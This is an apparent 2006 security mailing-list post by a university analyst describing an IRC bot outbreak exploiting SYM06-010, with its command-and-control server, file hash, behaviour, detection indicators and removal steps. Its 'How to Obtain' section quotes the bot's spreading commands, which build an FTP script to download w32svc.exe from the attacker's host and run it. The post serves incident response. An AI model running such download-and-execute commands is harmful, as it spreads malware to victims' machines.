[unisog] More: Bot outbreak exploiting SYM06-010

Brian Eckman eckman at umn.edu
Tue Nov 28 00:02:11 GMT 2006

We had a number of hosts become infected with an IRC bot today that used
www.flackware.info as the Command and Control. Here is information that
I know so far:

Command and Control
. www.flackware.info:6667/tcp (the only apparent name/port used)
. (auto)JOIN #text airforce

File Info
. MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
. w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
. Symantec definitions 11/27/2006 rev.50 and later will detect it as a
Spybot variant

How to Obtain
The bot uses a build-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
spread. When it compromises a machine, it executes the following commands:

echo open (ip address of attacker) (ftp server port) > i
echo user 1 1 >> i
echo get w32svc.exe >> i
echo quit >> i
ftp -As:i

When Run
. Installs itself to %WINDIR%\w32svc.exe
. Sets Windows File Protection to "Scan only at bootup"
. Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
and backup.tftp
. Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
. Attempts to connect to the Command and Control server
. Installs itself as a service in many places within the registry

Infection Vectors
. Almost certainly via SYM06-010
. Almost certainly other Windows vulnerabilities (since patched)

Detecting Infections - Network
. Looking for DNS queries for www.flackware.info
. Looking for network traffic to port 6667/tcp going to the IP address
for www.flackware.info
. Looking for scanning (more than 3-4 destinations) on port 2967/tcp

Identifying Infection - At the Computer
. Look for %WINDIR%\w32svc.exe
. Look for a Service called "Windows Network Firewall"

Symantec definitions 11/27/2006 rev.50 performed admirably on my test
box. Assuming the host did not have any other malware loaded onto it
after infection, updating the AV defs to that "rev" or later, scanning
the hard drive, then rebooting when prompted should do the trick.

Manual Removal: Set the "Windows Network Firewall" service to
"Disabled", and reboot (you can't stop the service while it is running).
Delete the w32svc.exe file, and preferably, remove the associated
(dozens of) registry keys.


Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance

More information about the unisog mailing list